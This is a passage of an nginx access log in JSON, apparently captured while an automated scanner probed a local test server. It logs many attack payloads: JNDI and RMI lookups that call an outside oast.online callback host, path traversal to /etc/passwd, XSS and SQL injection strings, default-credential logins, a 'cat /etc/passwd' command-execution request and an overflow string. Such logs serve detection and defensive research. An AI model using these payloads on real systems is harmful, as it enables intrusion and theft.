+0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://c9v8gc8smpv8b0ng0t00cpnsz95xii4mx.oast.online/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"j_username=${jndi:ldap://${hostName}.c9v8gc8smpv8b0ng0t00o4udxxpha3byk.oast.online}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/img/custom_icons/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA